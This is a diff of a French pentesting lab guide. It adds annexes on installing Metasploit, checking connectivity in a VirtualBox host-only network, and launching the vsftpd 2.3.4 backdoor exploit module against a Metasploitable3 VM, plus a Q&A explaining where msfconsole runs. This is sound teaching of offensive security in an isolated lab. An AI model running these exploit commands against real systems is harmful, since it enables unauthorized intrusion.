--- a/B6-Projet6-Metasploitable/00-lab6.md
+++ b/B6-Projet6-Metasploitable/00-lab6.md
@@ -263,7 +263,133 @@ iface enp0s8 inet static
 
 Assurez-vous d'adapter ces instructions à votre gestionnaire de réseau spécifique et redémarrez le service réseau ou la machine pour tester les changements.
 
-# Annexe 2 - Attaque par Force Brute sur un Service SSH avec Metasploit
+---------
+# Annexe 2 - Utilisation de Metasploit (`msfconsole`) et Test de Connectivité sur un Réseau Host-Only
+
+
+
+**Metasploit Framework (`msfconsole`)** est une plateforme puissante pour le développement et l'exécution d'exploits contre des machines distantes. Voici un guide pour démarrer avec Metasploit sur votre machine Ubuntu et utiliser cette plateforme pour lancer des attaques sur une machine virtuelle Metasploitable3, ainsi que pour vérifier la connectivité entre les machines dans votre réseau Host-Only.
+
+#### **Partie 1: Comprendre `msfconsole`**
+
+`msfconsole` est l'interface en ligne de commande de Metasploit qui vous permet d'interagir avec le framework. Il n'est pas un "client" au sens traditionnel, mais plutôt un environnement interactif pour rechercher, configurer et utiliser des exploits et d'autres outils de sécurité.
+
+#### **Partie 2: Installation de Metasploit**
+
+Sur Ubuntu, suivez ces étapes pour installer Metasploit:
+
+```bash
+sudo snap install metasploit-framework
+```
+
+Une fois l'installation terminée, vous pouvez lancer Metasploit en tapant :
+
+```bash
+msfconsole
+```
+
+#### **Partie 3: Vérification de la Connectivité**
+
+Avant de lancer des attaques, assurez-vous que toutes les machines peuvent se communiquer entre elles. Utilisez `ping` pour vérifier la connectivité :
+
+- **Depuis Ubuntu vers Metasploitable3** :
+
+  ```bash
+  ping 172.28.128.3
+  ```
+
+- **Depuis Ubuntu vers une autre machine (par exemple une autre VM sous Windows ou Ubuntu)** :
+
+  ```bash
+  ping <IP autre machine>
+  ```
+
+Assurez-vous que les réponses ne montrent pas d'erreur et que les paquets sont reçus.
+
+#### **Partie 4: Lancer une Attaque avec Metasploit**
+
+1. **Lancez `msfconsole`** sur votre machine Ubuntu :
+
+   ```bash
+   msfconsole
+   ```
+
+2. **Recherchez un exploit approprié pour Metasploitable3**. Par exemple, pour exploiter un service FTP vulnérable :
+
+   ```bash
+   search vsftpd
+   ```
+
+3. **Choisissez et configurez l'exploit** :
+
+   ```bash
+   use exploit/unix/ftp/vsftpd_234_backdoor
+   set RHOSTS 172.28.128.3
+   ```
+
+4. **Lancez l'exploit** :
+
+   ```bash
+   run
+   ```
+
+   Ou
+
+   ```bash
+   exploit
+   ```
+
+#### **Partie 5: Tester les Exploits et Récolter les Données**
+
+Après avoir lancé l'exploit, observez les résultats. Si l'exploit réussit, vous pourriez obtenir un accès à la machine cible ou recueillir des informations sensibles.
+
+#### **Résumé**
+
+Ce README vous guide sur comment utiliser `msfconsole` pour tester la sécurité de machines dans un environnement virtuel. Assurez-vous de n'utiliser Metasploit que dans un cadre légal, typiquement dans un laboratoire de test ou avec des machines dont vous avez la permission explicite de tester. Toute utilisation non autorisée est illégale et éthiquement répréhensible.
+
+---
+# Annexe 3 - Explications - Question à Explorer avec les Étudiants
+
+**Contexte :**  
+Vous avez configuré un réseau virtuel Host-Only dans VirtualBox avec les paramètres suivants :
+
+- **Adaptateur Host-Only** : 172.28.128.1/24
+- **Serveur DHCP** : 172.28.128.2/24
+- **Plage d'adresses permises** : de 172.28.128.3 à 172.28.128.244
+- **Adresse IP de Metasploitable3** : 172.28.128.3/24
+- **Adresse IP d'Ubuntu 2204** : 172.28.128.5/24
+
+- Vous allez sur la machine Ubuntu et lancez les commandes suivantes :
+
+```bash
+snap install metasploit-framework
+msfconsole
+```
+
+**Question :**  
+Est-ce que `msfconsole` démarre sur la machine Metasploitable3 de Vagrant lorsque vous exécutez ces commandes sur Ubuntu ? Expliquez le rôle de `msfconsole` dans ce contexte et comment vous pouvez l'utiliser pour interagir avec la machine Metasploitable3.
+
+**Réponse**
+
+D'après la configuration de votre adaptateur Host-Only dans VirtualBox et les informations que vous avez fournies, votre réseau est configuré de manière à permettre la communication entre vos machines virtuelles sur le réseau isolé Host-Only.
+
+Pour votre question sur Metasploit (`msfconsole`), voici comment cela fonctionne :
+
+1. **Démarrage de Metasploit sur Ubuntu** : Lorsque vous lancez `msfconsole` sur la machine Ubuntu, vous êtes en train de démarrer l'interface de Metasploit sur cette machine, pas sur la machine Metasploitable3.
+
+2. **Utilisation de Metasploit pour attaquer Metasploitable3** : Une fois que `msfconsole` est lancé sur Ubuntu, vous pouvez l'utiliser pour cibler la machine Metasploitable3 (qui a l'adresse IP 172.28.128.3 dans votre réseau Host-Only). Vous devrez utiliser des modules et des configurations spécifiques dans Metasploit pour lancer des attaques ou des scans sur la machine Metasploitable3.
+
+3. **Commandes Metasploit** : Vous devrez configurer les options de Metasploit pour cibler l'adresse IP de Metasploitable3. Par exemple, pour un test simple, vous pourriez utiliser un module de scan de port ou d'exploitation, définir l'adresse IP de la cible (RHOSTS) sur `172.28.128.3`, et exécuter le module.
+
+Metasploit ne démarre pas "sur" la machine Metasploitable3; il s'exécute sur Ubuntu et peut être utilisé pour interagir avec Metasploitable3 si configuré correctement.
+
+
+---
+
+
+
+---------
+# Annexe 4 - Attaque par Force Brute sur un Service SSH avec Metasploit
 
 #### Prérequis
 1. **Kali Linux** (comme machine attaquante)
